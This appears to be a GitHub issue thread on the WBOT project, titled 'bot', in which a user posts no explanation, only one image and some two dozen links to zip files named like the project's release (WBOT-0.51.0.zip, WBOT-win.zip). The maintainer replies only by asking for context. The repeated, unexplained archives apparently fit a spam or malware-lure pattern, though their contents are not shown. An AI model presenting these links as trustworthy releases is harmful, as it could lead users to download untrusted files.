### ISSUE TITLE
bot

### ISSUE THREAD

**Issue by Ufwnoku** [vasani-arpit/WBOT#358]
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13516995/WBOT-0.51.0.zip)
![github (1)](https://github.com/vasani-arpit/WBOT/assets/151382230/1b8f9cbc-f2db-452d-bb98-a7f554076a2d)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13516997/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13516999/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517000/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517001/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517002/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517003/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517005/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517008/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517009/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517010/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517011/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517013/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517016/WBOT-0.51.0.zip)
[WBOT-win.zip](https://github.com/vasani-arpit/WBOT/files/13517018/WBOT-win.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517021/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517025/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517026/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517028/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517029/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517032/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517034/WBOT-0.51.0.zip)
[WBOT-0.51.0.zip](https://github.com/vasani-arpit/WBOT/files/13517035/WBOT-0.51.0.zip)

**Comment by vasani-arpit** [comment]
Please provide context
